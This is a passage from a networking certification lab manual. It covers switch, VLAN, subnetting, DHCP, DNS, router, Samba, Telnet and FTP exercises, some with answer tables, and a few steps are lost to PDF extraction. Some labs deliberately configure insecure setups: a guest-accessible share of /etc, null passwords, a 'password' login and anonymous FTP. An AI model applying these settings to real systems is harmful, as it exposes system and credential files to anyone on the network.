the main menu, choose A for port addressing.
26. Type 8 for port 8. You will configure port 8 to only accept one system to connect to that port
based off the MAC address.
27. Choose S and then E to enable the address security feature.
28. Choose T and then type 1 and press ENTER to limit the MAC table for this port to one MAC
address.
29. Then choose A to assign a static MAC address to the port.
30. Type 00 50 56 C0 00 08 as the MAC address. Note that this is not your MAC address, so
when you connect to port 8, you will see an amber light indicating that the port is unusable
until the proper system is plugged in.
31. You will notice at the top of the screen that it says port 8 is configured for a static MAC
address.
32. Choose X for exit.
- 40 -
Glen E. Clarke
Configuring Port Mirroring (Port Monitoring)

33. To enable port monitoring, choose M for monitoring.
34. Choose C and then type E to enable capturing to traffic.
35. Choose M to choose which port is the monitored port that receives a copy of the traffic. Type
12 as the port number to receive a copy of all traffic.
36. To choose which ports will send a copy of traffic to the monitored port, choose A to add
ports to the capture list. Type all to add all ports.
37. Choose X to exit.
- 41 -
Glen E. Clarke
Exercise 3-5
Configuring VLANs on a Cisco Switch
In this exercise, you will configure two VLANs on your Cisco 1900 switch. In this
example you will use the menu system to keep things simple.
1. To manage the switch, connect the console cable (also known as a rollover cable) to the
serial port on the back of your computer and then the other end to the console port on the
back of the switch.
2. You are then asked for a name of the new connection. Type mySwitch and then choose OK.
choose OK.
control to None.
5. Click OK.
6. Power on the switch. You should see the output of the switch booting up that includes the
Creating Two VLANs
7. Using the menu system, you will create two VLANs. Choose V for Virtual LAN.
8. Choose A to add a VLAN and then press 1 to specify the type of Ethernet.
- 42 -
Glen E. Clarke
9. The VLAN screen appears. Choose V to set the name of the VLAN and then type ACCT to
create a VLAN for the accounting systems and press ENTER.
10. Choose S to save and exit.

11. To create another VLAN, type A to add a VLAN and then choose 1 for an Ethernet VLAN.
12. Choose V to set the VLAN name and type Marketing as the name and press ENTER.
13. Choose S to save and exit.
Adding the Ports to a VLAN
14. To add ports 1 to 6 to the ACCT VLAN, choose E for VLAN membership. You can see that
all ports are part of the first VLAN.
- 43 -
Glen E. Clarke
15. Choose V to assign ports to a VLAN and then type 1-6 for the ports.
16. When prompted for which VLAN to place these ports in, type 2 for VLAN number two.
17. To add ports 7 to 12 to the Marketing VLAN, choose V to assign ports to a VLAN and then
type 7-12 for the ports.
18. When prompted for which VLAN to place these ports in, type 3 for VLAN number three.
19. Choose X twice to exit to the main menu.
- 44 -
Glen E. Clarke
Exercise 4-1
Identifying Remote Systems
In this exercise, you will determine whether two systems exist on the same network or
not by filling in the following table:
ComputerA
ComputerA
ComputerB
Same
(IP address)
(subnet mask)
(IP address)
Network?
12.45.8.34
255.0.0.0
14.34.212.5
131.107.4.78
255.255.0.0
131.108.45.112
198.45.23.2
255.255.255.0
198.45.23.14
26.45.78.5
255.0.0.0
28.45.78.15
176.34.56.12
255.255.0.0
176.34.12.10
You should have come up with the following answers. To solve these questions, you
would look at the subnet mask of ComputerA to determine the octets that are the network ID in
the IP address. Once you do that, if ComputerB has the same network ID, it is on the same
network.
ComputerA
ComputerA
ComputerB
Same
(IP address)
(subnet mask)
(IP address)
Network?
12.45.8.34
255.0.0.0
14.34.212.5
No
131.107.4.78
255.255.0.0
131.108.45.112
No
198.45.23.2
255.255.255.0
198.45.23.14
Yes
- 45 -
Glen E. Clarke
26.45.78.5
255.0.0.0
28.45.78.15
No
176.34.56.12
255.255.0.0
176.34.12.10
Yes
- 46 -
Glen E. Clarke
Exercise 4-2
Converting Decimal to Binary
In this exercise, you will practice converting decimal values to binary by filling out the
following table.
Decimal
Binary
127
131
198
224
96
192.168.1.100
216.83.11.78
202.14.45.0
After you have converted the decimal values to binary, you should have the answers
presented in the following table.
Decimal
Binary
127
01111111
131
10000011
- 47 -
198
11000110
224
11100000
96
01100000
192.168.1.100
11000000 . 10101000 . 00000001 . 01100100
216.83.11.78
11011000 . 01010011 . 00001011 . 01001110
202.14.45.0
11001010 . 00001110 . 00101101 . 00000000
Glen E. Clarke
- 48 -
Glen E. Clarke
Exercise 4-3
Converting Binary to Decimal
In this exercise, you will practice converting binary values to decimal values by filling
out the following table.
Binary
Decimal
10110101
11000011
10000111
11111111
10101011
11000001. 10000001. 00001011. 10100001
00000111. 10101001. 00110101. 10110101
11000000. 10100001. 00000111. 11111111
After you have converted the binary values to decimal, you should have the answers
presented in the following table.
Binary
Decimal
10110101
181
11000011
195
- 49 -
Glen E. Clarke
10000111
135
11111111
255
10101011
171
11000001. 10000001. 00001011. 10100001
193.129.11.161
00000111. 10101001. 00110101. 10110101
7.169.53.181
11000000. 10100001. 00000111. 11111111
192.161.7.255
- 50 -
Glen E. Clarke
Exercise 4-4
Identifying Address Classes
In this exercise, you will practice identifying address classes for different IP addresses
and their associated subnet masks. Fill in the following table.
IP Address
Subnet Mask
Address Class
27.56.89.234
196.79.123.56
130.49.34.23
109.189.109.200
189.90.23.100
126.34.100.12
14.198.120.100
After you have completed the foregoing table, check your answers with the answer table
that follows.
IP Address
Subnet Mask
Address Class
27.56.89.234
255.0.0.0
Class A
196.79.123.56
255.255.255.0
Class C
130.49.34.23
255.255.0.0
Class B
- 51 -
Glen E. Clarke
109.189.109.200
255.0.0.0
Class A
189.90.23.100
255.255.0.0
Class B
126.34.100.12
255.0.0.0
Class A
14.198.120.100
255.0.0.0
Class A
- 52 -
Glen E. Clarke
Exercise 4-6
Configuring TCP/IP to Use DHCP
In this exercise, you will learn how to configure TCP/IP on your Windows client to use
DHCP.
1. Go to your Windows XP system.
2. Click Start, right-click My Network Places, and choose Properties.
3. Right-click your LAN connection and choose Properties.
4. Select the TCP/IP protocol and click Properties.
5. The TCP/IP Properties dialog box appears. To configure your system as a DHCP client,
choose the Obtain an IP address automatically setting.
6. Click OK and close all windows.
- 53 -
Glen E. Clarke
Exercise 4-7
Configuring TCP/IP to Use DNS and WINS
In this exercise, you will learn how to configure TCP/IP on your Windows client to use a
DNS server and a WINS server for name resolution.
1. Go to your Windows XP system.
2. Click Start, right-click My Network Places, and choose Properties.
3. Right-click your LAN connection and choose Properties.
4. Select the TCP/IP protocol and click Properties.
5. In the TCP/IP Properties, click Advanced.
6. In the Advanced TCP/IP Settings dialog box, click the WINS tab and click Add to point the
client to the WINS server.
7. Type the IP address of 10.0.0.1 as the WINS server.
8. Choose OK.
9. Click OK.
10. To point to a DNS server on the network, select Use the following DNS server addresses
and then type the IP address of the DNS server.
11. Click OK.
12. Click OK and then close all remaining windows.
- 54 -
Glen E. Clarke
Exercise 4-8
Installing and Configuring DHCP Services
In this exercise, you will learn how to install and configure a DHCP server in Windows
Server 2003 and how to build a DHCP scope, which is a range of addresses to be handed out to
clients on the network.
1. Log on to your 2003SERVERA as the administrator account.
2. Choose Start | Control Panel | Add/Remove Programs.
3. Choose Add/Remove Windows Components on the left.
4. Scroll down to Network Services, highlight it, and then choose Details because you want to
choose which network services to install.
5. The list of network services is displayed. Choose the check box for Dynamic Host
Configuration Protocol to install the DHCP server.
6. Click OK.
7. Click Next. Windows will copy the files needed for these services. You may be prompted for
the Windows 2003 Server CD; place it in the CD-ROM drive if asked.
8. Click Finish.
9. Close all remaining windows.
10. Now that DHCP is installed, you need to configure the DHCP server with a scope. A scope is
a range of IP addresses that the server is allowed to automatically assign to DHCP clients.
Click Start | All Programs | Administrative Tools | DHCP.
11. The DHCP console starts up. To create a new scope of addresses, right-click the server and
choose New Scope.
12. The New Scope Wizard appears. Click Next.
13. You can give the scope a name and description if you want and then click Next.
- 55 -
Glen E. Clarke
14. Type the starting IP address and the ending IP address of the range. In our example, you will
use the starting address of 10.0.0.50 and 10.0.0.60 as the ending address. Notice that the
subnet mask is shown, and you can change it if you like. Click Next.
15. You can exclude addresses from the range if you are already using them on systems. The
DHCP server will not give out addresses that are excluded. You have no need for exclusions,
so click Next.
16. You can specify how long clients will have the IP address when assigned from the DHCP
server. This is known as the lease time. When the time expires, the client will lose the
address if it is not renewed. Type 3 for days and press Next.
17. You can configure client systems with all TCP/IP settings, including the default gateway, the
address of the DNS server, and the address of the WINS server as well. Choose No, I will
configure these options later and press Next. You will configure them manually after the
fact.
18. Click Finish.
19. After the wizard has completed, expand out your scope by clicking the + sign beside it and
then select the Address Pool item on the left. You can see the addresses that the DHCP
server will assign on the network.
20. Select Scope Options and then right-click it and choose Configure Options. This will allow
you to specify the router address (default gateway) and the DNS server for the network so
that clients are automatically configured for them.
21. In the Scope Options dialog box, select the 003 Router check box found on the General tab
to allow DHCP to give out the router (default gateway) address. After selecting this check
box, type in the IP address of 10.0.0.1 and click Add.
22. Scroll down in the available options found at the top of the dialog box and select 006 DNS
Server. Set the DNS server to the address of your DNS server (10.0.0.1). Once you have set
the address of the DNS server, click Add. This will allow DHCP to configure all the clients
to point to your DNS server on the network so that you will not have to configure each client
individually.
- 56 -
Glen E. Clarke
23. Click OK. You can see the two scope options on the right side of the DHCP console that you
have allowed DHCP to hand out to the clients. The scope options that you have enabled are
003 Router and 006 DNS Server.
24. To enable the DHCP scope, right-click Scope on the left side of the screen and choose
Activate.
25. If you notice that the server on the left side of your screen has a red down arrow, you will
need to authorize it. To authorize the server, right-click the server found on the left side of
the screen and choose Authorize.
26. Once the DHCP server has been authorized, you will see a green up arrow indicating that the
DHCP server is up and running. You will also notice on the right side of the screen that the
scope is active if you select the server.
27. Close the DHCP console.
28. Now go to your Windows XP client, and change the TCP/IP settings so that the system is set
to obtain an IP address automatically.
29. Renew the IP address on the XP client by going to a command prompt and typing ipconfig
/renew. The XP client should receive an address from your newly created DHCP server. For
more information on configuring a DHCP client, refer to Exercise 4-6.
- 57 -
Glen E. Clarke
Exercise 4-9
Configuring a DNS Zone
In this exercise, you will learn how to create a DNS zone on a Windows Server 2003
DNS server.
1. Log on to 2003ServerA as the administrator account.
2. You can manage the DNS server and its records by going to the DNS console. You may start
the DNS console by choosing Start | All Programs | Administrative Tools | DNS.
3. Once the DNS console loads up, expand out the server contents by clicking the + sign located
to the left of the server (2003SERVERA). Expand forward lookup zones by clicking the +
sign as well.
4. To create a new DNS zone, right-click Forward Lookup Zones and choose New Zone. A
zone is a DNS namespace whose DNS records you want to manage.
5. The New Zone Wizard displays. Click Next.
6. You wish to create a primary zone because a primary zone is responsible for creating DNS
records for its zone. Ensure that the Standard primary is selected and choose Next.
7. Type lab4-9.com as the zone name and choose Next.
8. Choose Next to accept the default zone filename. This is where the actual DNS records are
stored when you build them with the console.
9. Click Finish.
Creating DNS Records
10. You will now create a DNS host record, which is a friendly name for your servers IP
address. In the DNS console, right-click the lab4-9.com zone and choose New Host.
11. In the New Host dialog box, type server2 as the name and type the IP address 10.0.0.2. Note
that the Fully Qualified Domain Name of the system will be server2.lab4-9.com.
12. Click Add Host.
- 58 -
Glen E. Clarke
13. Click OK. You can now add another host entry for another system if you like and can
continue to do so until you have created records for all servers on the network. When you are
finished, click Done. You should now have the records you built in the DNS zone.
14. Close the DNS console.
Testing the New DNS Record
15. Switch to the XP Client and start a command prompt.
16. To test the new DNS entry you created, type ping server2.lab4-9.com.
17. Do you get a reply? __________________ Why or why not? ______________
________________________________________________________________
________________________________________________________________
- 59 -
Glen E. Clarke
Exercise 4-10
Configuring Samba on Linux
In this exercise, you will learn how to configure Samba on the Red Hat Linux 8 operating
system. To enable and configure Samba, you will use a graphical web-based tool called Webmin.
Webmin is freeware that you can download fromwww.webmin.com and install on your Linux
machine that provides an easy-to-use web interface to configure Samba without requiring you to
know Linux commands. Be sure to download the Webmin software prior to starting the exercise.
Webmin is freeware that can be downloaded fromwww.webmin.com to run on most
UNIX and Linux operating systems. It is used to manage a number of different network services
on UNIX or Linux.
1. Boot up your Linux computer and log in as the root user (keep in mind that both usernames
and passwords are case sensitive in Linux).
2. Download the Webmin software to the root-user accounts home directory. At the time of
this writing, Webmin version 1.450-1 is the current version. Download the software to the
home directory of the root-user account.
3. Once the download is complete, you will notice a folder on the desktop for the root-users
home directorydouble-click this to browse the file system.
4. Browse to the Webmin file that you downloaded fromwww.webmin.com (it will be named
something similar to webmin-1.450-1.tar.gz).
5. Right-click the file, choose Scripts, and then choose Extract_here to unzip the file.
6. A folder will be created in the current directory (named something similar to webmin-1.4501)open this folder and locate a file named setup.sh. This is the installer file; double-click it
to start the Webmin install.
7. After double-clicking, you will be prompted with a series of choices on what to do with the
file; select Run In Terminal because the Webmin install is text based.
8. The installation program will prompt you with some optionsyou can press ENTER to accept
the default settings for each question, except for the ones listed as follows:
- 60 -
Glen E. Clarke
a. Set the login password to password (without the quotes) This is the case-sensitive
password you use to log in to the Webmin web-based tool. Also note that the use of
password as the password is not good practice in production environments.
b. Make sure to answer y to Start Webmin at boot time
Wait while the install
completes and Webmin is auto-started.

9. Using a web browser (on any machine), connect using your Linux machines IP address and
specify the Webmin port of 10000for example: http://10.0.0.30:10000.
10. When prompted to authenticate, specify admin as the username and password as the login
password. (Remember that usernames and passwords are case sensitive!) You should see the
Webmin home page once youve logged in.
11. Click the Servers icon (top menu, third from the left), then scroll to the bottom of the page,
and click the Samba Windows File Sharing.
12. Samba is not turned on by default; turn it on by clicking the Start Samba Servers button at
the bottom left of the page.
13. You are going to share the Linux etc subdirectory in this example, so you must click
Create A New File Share located at the upper-left corner of the page.
14. Type etc as the share name, type /etc as the Directory To Share, and then click Create.
15. Click the etc share so that you can allow guest access for this example.
16. Click the Security And Access Control icon and then click Yes next to the Guest Access?
optionbe certain you click Save.
17. Before you can connect to the etc share from Windows clients, you need to Samba-enable the
Linux user accounts, which will allow Windows clients to be authenticated and authorized as
these accounts. To Samba-enable the Linux accounts, go back to the Samba Windows File
Sharing page and scroll to the bottom.
18. Click the Convert UNIX Users To Samba Users link in the Samba Users section located
toward the bottom of the page.
- 61 -
Glen E. Clarke
19. On the Convert Users page, clear the text499 in the Dont convert these users text
boxbut leave the check box enabled. Click Convert Users to convert the UNIX users to
Samba users.
20. A summary page is displayed listing a number of users that have been converted. Click the
Return To Share List link at the bottom of the page.
21. On the Samba Windows File Sharing page, click the Authentication link in the Global
Configuration section.
22. Select Yes for Allow Null Passwords on the right side of the page and choose Save.
23. Close the browser; you have completed configuring Samba for this exercise.
24. From the Windows XP client, go to Start | Run and type the UNC path to the etc share on
your Linux machinefor example \\10.0.0.30\etc. If you are asked to log on, use the
username nobody and no password. You should now see the contents of the /etc
subdirectory on the Linux server as if it were a shared resource on a Windows Server.
- 62 -
Glen E. Clarke
Exercise 5-1
Subnetting a Class B Network
You have the class B network ID of 150.87.0.0, and you need to divide this network into
six subnets. Use some paper and calculate the network ID, first valid address, last valid address,
and broadcast address of each of the six subnets. Dont forget to determine the new subnet mask
of these networks as well. Fill in the following table when you have completed your work on
paper:
Network ID
First Valid
Last Valid
Broadcast
Address
Address
Address
Subnet 1
Subnet 2
Subnet 3
Subnet 4
Subnet 5
Subnet 6
New Subnet Mask: ____________________________________
- 63 -
Glen E. Clarke
Exercise 5-1 Answer

The following table displays the answers, including the new subnet mask for each of the
six subnets presented in the lab question.
First Valid
Last Valid
Broadcast Address
Network ID
Address
Address
Subnet 1
150.87.32.0
150.87.32.1
150.87.63.254
150.87.63.255
Subnet 2
150.87.64.0
150.87.64.1
150.87.95.254
150.87.95.255
Subnet 3
150.87.96.0
150.87.96.1
150.87.127.254
150.87.127.255
Subnet 4
150.87.128.0
150.87.128.1
150.87.159.254
150.87.159.255
Subnet 5
150.87.160.0
150.87.160.1
150.87.191.254
150.87.191.255
Subnet 6
150.87.192.0
150.87.192.1
150.87.223.254
150.87.223.255
New Subnet Mask: 255.255.224.0
- 64 -
Glen E. Clarke
Exercise 5-2
Subnetting a Class A Network
You have the class A network ID of 14.0.0.0, and you need to divide this network into
eight subnets. Use some paper and calculate the network ID, first valid address, last valid
address, and broadcast address of each of the eight subnets. Dont forget to determine the new
subnet mask of these networks as well. Fill in the following table when you have completed your
work on paper:
Network ID
First Valid
Last Valid
Broadcast
Address
Address
Address
Subnet 1
Subnet 2
Subnet 3
Subnet 4
Subnet 5
Subnet 6
Subnet 7
Subnet 8
New Subnet Mask: ____________________________________
- 65 -
Glen E. Clarke
Exercise 5-2 Answer:

eight subnets presented in the lab question.
First Valid
Last Valid
Broadcast Address
Network ID
Address
Address
Subnet 1
14.16.0.0
14.16.0.1
14.31.255.254
14.31.255.255
Subnet 2
14.32.0.0
14.32.0.1
14.47.255.254
14.47.255.255
Subnet 3
14.48.0.0
14.48.0.1
14.63.255.254
14.63.255.255
Subnet 4
14.64.0.0
14.64.0.1
14.79.255.254
14.79.255.255
Subnet 5
14.80.0.0
14.80.0.1
14.95.255.254
14.95.255.255
Subnet 6
14.96.0.0
14.96.0.1
14.111.255.254
14.111.255.255
Subnet 7
14.112.0.0
14.112.0.1
14.127.255.254
14.127.255.255
Subnet 8
14.128.0.0
14.128.0.1
14.143.255.254
14.143.255.255
- 66 -
Glen E. Clarke
Exercise 5-3
Subnetting a Class C Network
You have the class C network ID of 216.83.11.0, and you need to divide this network into
four subnets. Use some paper and calculate the network ID, first valid address, last valid address,
and broadcast address of each of the four subnets. Dont forget to determine the new subnet
mask of these networks as well. Fill in the following table when you have completed your work
on paper:
Network ID
First Valid
Last Valid
Broadcast
Address
Address
Address
Subnet 1
Subnet 2
Subnet 3
Subnet 4
New Subnet Mask: ____________________________________
- 67 -
Glen E. Clarke
Exercise 5-3 Answer

four subnets presented in the lab question.
First Valid
Last Valid
Broadcast Address
Network ID
Address
Address
Subnet 1
216.83.11.32
216.83.11.33
216.83.11.62
216.83.11.63
Subnet 2
216.83.11.64
216.83.11.65
216.83.11.94
216.83.11.95
Subnet 3
216.83.11.96
216.83.11.97
216.83.11.126
216.83.11.127
Subnet 4
216.83.11.128
216.83.11.129
216.83.11.158
216.83.11.159
- 68 -
Glen E. Clarke
Exercise 5-4
Configuring Cisco Routers
In this exercise, you will configure two Cisco 2501 routers by changing the names of the
routers and configuring the interfaces on the routers so that the routers route data between the
three different networks shown next.
1. Connect the Ethernet ports of each router to a different switch.

2. Connect the Serial 0 ports together with a DTE/DCE cable, which will be configured as a
point-to-point link. Ensure that the DCE end of the cable is connected to Router1.
3. To manage the router, connect the console cable (also known as a rollover cable) to the serial
port on the back of your computer and then the other end to the console port on the back of
the first routeryou will call this Router1.
4. You are then asked for a name of the new connection. Type myRouter and then choose OK.
choose OK.
control to None.
7. Click OK.
8. Power on the router. You should see the output of the switch booting up that includes the
Configuring Router1
9. To configure the name of the router, type the following commands:
- 69 -
Glen E. Clarke
Enable
Config term
Hostname Router1
10. To configure the IP address on the Ethernet interface and enable the interface, type the
following:
Interface ethernet0
Ip address 11.0.0.1 255.0.0.0
No shutdown
11. To configure the Serial 0 port on Router1, type the following:

Interface serial0
Ip address 12.0.0.1 255.0.0.0
Encapsulation hdlc
Clock rate 64000
No shutdown
Note: The previous commands assign an IP address to the serial port but also set the
encapsulation protocol. Setting the encapsulation protocol is something that must be done on the
serial link. Also, because Router1 is the data communication equipment, you need to set the
speed of the link with the clock rate command.
Configuring Router2
12. Connect your console cable to the back of Router2 now and power on Router2.
13. To configure the name of the router, type the following commands:
Enable
Config term
Hostname Router2
14. To configure the IP address on the Ethernet interface and enable the interface, type the
following:
Interface ethernet0
Ip address 13.0.0.1 255.0.0.0
No shutdown
15. To configure the Serial 0 port on Router1, type the following:
- 70 -
Glen E. Clarke
Interface serial0
Ip address 12.0.0.2 255.0.0.0
Encapsulation hdlc
No shutdown
Adding a Route on Router1 to the 13.0.0.0 Network

16. Connect back to the console port of Router1 and press ENTER to refresh the screen.
17. Type exit twice to navigate back to the Router1 # prompt.
18. Type ping 13.0.0.1do you get replies? _________ The answer should be no because
Router1 does not have a route to the 13.0.0.0 network.
19. To view the routing table on Router1, type show ip routenotice that you have a route to
the 11.0.0.0 and 12.0.0.0 networks because the router is connected to those networks.
20. To add a route to the 13.0.0.0 network, type the following:
Config term
Ip route 13.0.0.0 255.0.0.0 12.0.0.2
21. Type exit and then show ip route to verify that the new route has been added.
Adding a Route on Router2 to the 11.0.0.0 Network
22. Connect back to the console port of Router2 and press ENTER to refresh the screen.
23. Type exit twice to navigate back to the Router2# prompt.
24. Type ping 11.0.0.1do you get replies? _________ The answer should be no because
Router2 does not have a route to the 11.0.0.0 network.
25. To view the routing table on Router2, type show ip routenotice that you have a route to
the 13.0.0.0 and 12.0.0.0 networks because the router is connected to those networks.
26. To add a route to the 11.0.0.0 network, type the following:
Config term
Ip route 11.0.0.0 255.0.0.0 12.0.0.1
27. Type exit and then show ip route to verify that the new route has been added.
- 71 -
Glen E. Clarke
Exercise 6-1
Using ARP to See Your Local ARP Cache
In this exercise, you will view your ARP cache to view the MAC addresses of systems
that you have communicated with. You will then ping the IP address of a system that does not
appear in your ARP cache and verify that it was added to the cache. After viewing the ARP
cache, you will analyze Ping traffic from a capture file and view the ARP request being sent on
the network.
1. On the Windows XP client, go to the Command prompt by selecting Start | Run, and then
type CMD.
2. At the command prompt, type arp -a to view your ARP cache.
3. Make a note of any entries that are in your ARP cache.
_____________________________________________________________
_____________________________________________________________
4. You would like to clear the arp cache, so type arp -d
5. View the ARP cache with arp -a. Is the ARP cache clear of entries? __________
6. Ping the IP address of 2003SERVERA by typing ping 10.0.0.1.
7. At the command prompt, type arp -a.
8. Notice that the system that you have pinged is in the cache. This is because in order for any
data to be sent to the target system, your system will need to know the MAC address of that
system, and an ARP request went out to figure out the address; it was then stored in cache.
Viewing ARP Traffic with Network Monitor
In this part of the exercise you will open a packet capture made with Network Monitor,
and you will analyze the traffic that occurs when you ping another system. Understand that Ping
is just one example of communication between two systems and that no matter what type of
communication occurs, the MAC address must be determined.
9. Switch to the 2003ServerA VM.
- 72 -
Glen E. Clarke
10. Start Network Monitor from Start | All Programs | Administrative Tools | Network
Analysis Tools | Network Monitor. Open the packet capture called ping.cap from the Lab
Files\PacketCaptures folder.
11. Once you have the packet capture open, notice that there are 13 frames in the capture.
Further, by looking at the protocol column in the capture you can see that there are two ARP
frames (frames 3 and 4). You can also see that frame 3 is the ARP request going out to the
network, and frame 4 is the ARP reply coming back to the system.
12. Frame 3 is the ARP request; you need to find out whom the request is for. Double-click
frame 3 and expand the Ethernet section in the detail pane to determine the destination MAC
address of the frame. Record the MAC address information in the space provided:
Destination MAC Address: _____________________
Ethernet Type: _______________________________
13. You should have the following answers for the information collected previously. Notice that
the destination MAC address is all Fs. This is the hardware address of a network broadcast
which is destined to All systems on the network.
Destination MAC Address: __FFFFFFFFFFFF_____
Source MAC Address: __000C296BDE4D_________
Ethernet Type: ___Address Resolution Protocol____
14. Double-click the last line in the detail pane (the ARP: Request line). Notice that you have the
senders hardware address, the senders protocol address, and the target computers IP
address, and that the target computers hardware address is set to all 0sbecause it is
unknown. That is what ARP is trying to figure out.
15. Highlight frame 4 in the summary pane. This is the ARP reply. Double-click the ARP reply
section of the frame in the detail pane to expand it. Notice that in the ARP section of the
reply, you have the senders IP address and MAC address, along with the destinations MAC
address and IP address. The senders MAC address is what the initial system will use to send
data to this host.
- 73 -
Glen E. Clarke
16. Record the following information:
Source IP Address: ____________________________
Destination MAC Address: _____________________
Destination IP Address: ________________________
17. What is the MAC address of the system that was pinged (192.168.1.100)?
_______________________________________
18. Close Network Monitor.
- 74 -
Glen E. Clarke
Exercise 6-2
Configuring Telnet on Windows Server 2003
In this exercise, you will start the Telnet service in Windows Server 2003 and then telnet
from a client system to that server to create a user account.
1. Go to the 2003SERVERA VM.
2. Go to Start | All Programs | Administrative Tools | Services.
3. Scroll down and locate the Telnet service to ensure that it is running. If the service is not
running, right-click the service and choose Start.
4. Once the service shows a status of started, close the Services console.
5. From the Windows XP system, choose Start | Run.
6. Type cmd and press ENTER to go to a command prompt.
7. To telnet into the server, type telnet 10.0.0.1.
8. If you are prompted about the fact that you are sending a password across an Internet zone,
type y to continue and press ENTER.
9. Once you have pressed ENTER you will be authenticated with your Windows credentials
(because you have connected to the Windows Telnet server), and you will be sitting at the
servers console screen where you can start your remote administration.
10. To view a list of user accounts that exist on the remote server, type net user and then press
ENTER.
11. To create a new user account, type net user telnetuser Pa$$w0rd /add. This will create a
user named telnetuser with a password of Pa$$w0rd on the server.
12. Once you get the command completed successfully message, type net user again to verify
that the new account was created. In the example you can see that the telnetuser account was
in fact created.
13. Type exit to end the Telnet session.
14. Type exit to close the command prompt.
- 75 -
Glen E. Clarke
This exercise has shown you how to enable the Telnet service for remote administration
of a Windows Server 2003 system and how to create a new user account from the remote
session, the benefit being that you do not need to be at the server to perform administration. This
exercise was for demonstration purposes only; it is not recommend to enable the Telnet service
on your servers for remote administration. Look to other solutions like remote desktop for remote
administration.
- 76 -
Glen E. Clarke
Exercise 6-3
Using NBTSTAT to Determine the Local NetBIOS Name Table
In this exercise, you will view the NetBIOS name table of your local system and of a
remote system on the network to determine what names are registered on the network.
1. Have the 2003SERVERA, 2000 Server, and XP VM running.
2. Log on to the Windows XP VM.
3. Go to the command prompt by selecting Start | Run, and then type CMD.
4. At the command prompt, type NBTSTAT -n.
5. You will get a list of NetBIOS names registered on the local computer.
6. Record the following information about your system:
Computername: _______________________________
Locally logged on Username: ____________________
Is your system running the server service? _________
How do you know? ____________________________
7. The following answers come from the output that was shown in the previous illustration:
Computername: ____xpclient___________________
Locally logged on Username: __Administrator______
Is your system running the server service? __Yes____
How do you know? _<20> code is the server service____
Viewing a Remote Systems Name Table with NBTSTAT

8. At the command prompt, type nbtstat -A 10.0.0.20 to view the name table of the Windows
2000 system on your network.
9. Analyzing the output, you can see the <00> and <20> codes, which means that the
workstation and server service are running. You can see the <03> code registered twice, once
- 77 -
Glen E. Clarke
for the computer name of 2000SERVER and once for the locally logged-on username of
administrator. Also notice the <1C> code for INet Services, which means the server is
running IIS.
10. Type nbtstat -A 10.0.0.1 and record the information about 2003SERVERA in the space
provided. You may not have all the answers, depending on the type of system you are
analyzing.
Computername: _______________________________
Locally logged-on Username: ____________________
Is the system running the server service? _________
Is the system running the workstation service? _________
Is the system running the messenger service? _________
Is the system running IIS? _________
- 78 -
Glen E. Clarke
Exercise 6-4
Using Tracert to Determine Internet Paths
In this exercise, you will use the tracert utility to determine how many hops away the
www.syngress.com site is from your network. The tracert utility will show a response from each
router it hits between your system and the target system.
1. Go to a computer that has Internet access.
2. Go to the Command prompt by selecting Start | Run, and type CMD.
3. At the command prompt, type tracert www.syngress.com.
4. You will get a list of all of the routers or gateways between your PC and the McGraw-Hill
web site. You should notice that the packets leaving your network list the address of your
default gateway first. In my example I can see that in hop 8 we are at a router in Montreal,
Canada and in hop 9 we are at a router in New York.
- 79 -
Glen E. Clarke
Exercise 6-5
Using Netstat to Determine Open Connections to Other Systems
In this exercise, you will connect to an internal web site from the Windows XP client
system and then view who is connected to your web server using the netstat -n utility.
1. Be sure to start the 2003SERVERA and the Windows XP VM.
3. Before connecting to your server from your clients, view the TCP connections on the server
by going to a command prompt and typing netstat -n.
4. You have no results because no one is connected to your system. If you do have entries in the
netstat -n results, verify that in the local address column you have no entries with a :80.
These entries would be someone connected to your web server.
5. Once you have verified that there is no one connected to your web server, go to the Windows
XP client and connect to your web server by typing http://10.0.0.1 in Internet Explorer.
6. Now, go to the 2003SERVERA VM and verify that you can see the XP client system
connected to your web site by typing netstat -n. You are looking for an entry with a :80 at
the end of address in the local address column. If you dont get any results from netstat -n,
you may need to go to the XP VM and refresh the page and then come back to
2003SERVERA, type netstat -n again, and press ENTER.
7. From the netstat -n output, you can see the XP system (in the foreign address column) is
connected to your web server (local address).
8. Fill in the information that follows while looking at the netstat -a output:
IP address of the system connected to your web server? __________________
Port number used on client system? _______________
What is the IP address of the server? __________________________
What is the port number on the server the client is connected to? __________
9. Type exit from the command prompt.

- 80 -
Glen E. Clarke
Exercise 6-6
Using IPCONFIG
In this exercise, you will experiment with the ipconfig command-line utility to view your
TCP/IP settings.
1. Go to the Windows XP VM and ensure that your XP VM is a DHCP client.
2. Go to Start | Run and type CMD.
3. Type ipconfig and record your current TCP/IP settings in the space provided:
IP Address: _______________________________
Subnet Mask: _____________________________
Default Gateway: __________________________
1. At the command prompt, type ipconfig /all to view all of your TCP/IP settings. Record your
findings in the space provided:
Your MAC Address: _____________________________
Your DHCP Server: ______________________________
Your DNS Server: ________________________________
Lease Renew Date/Time: __________________________
2. At the command prompt, renew your IP address by typing ipconfig /renew.

3. Type ipconfig /all and record your settings in the space provided:
Lease Obtain Date/Time: __________________________
Lease Renew Date/Time: __________________________
4. Type exit.
- 81 -
Glen E. Clarke
Exercise 6-7
Creating the Folder Structure on the FTP Server
In this exercise, you will create two folders on a Windows Server 2003 FTP Server and
place a file into one of those folders. After you have placed the files on the FTP server, you will
connect to the FTP server from the Windows XP client. Make sure that you have the FTP server
software installed before starting this exercise. You can install the FTP Server from Add/Remove
programs in Windows.
1. Ensure that the 2003SERVERA and XPClient VMs are running.
2. Double-click My Computer on 2003SERVERA.
3. Double-click-the C drive.
4. Double-click the Inetpub folder to open it.
5. To open the ftproot folder, double-click the ftproot folder.
6. To create a folder for the Marketing team, choose File | New | Folder.
7. Type Marketing as the name of the new folder.
8. To create a folder for the Engineering team, choose File | New | Folder.
9. Type Engineering as the name of the new folder. You should have two folders in the ftproot
folder.
10. Double-click the Marketing folder.
11. To create a file in this folder, choose File | New | WordPad Document.
12. Type MarketingTrends as the filename.
13. Close all windows.
Using FTP on the Windows XP Client to Download the MarketingTrends File
14. On the Windows XP client, chose Start | Run and type CMD. This will place you in the
Windows command prompt.
15. At the command prompt, type ftp 10.0.0.1.
- 82 -
Glen E. Clarke
16. You will be asked to log in. To log in with the anonymous account, type ftp as the username
and press ENTER.
17. You will then be prompted for a password. Because you are logging in with the anonymous
account (ftp), you can simply press ENTER for the password, because there is no password.
18. You will then be notified that you have been logged in and presented with the ftp prompt.
19. Type ls, and press ENTER to get a listing of files and directories available on the FTP server.
Notice the Marketing and Engineering folders in the output.
20. To change directories to the Marketing directory, type cd Marketing, and press ENTER.
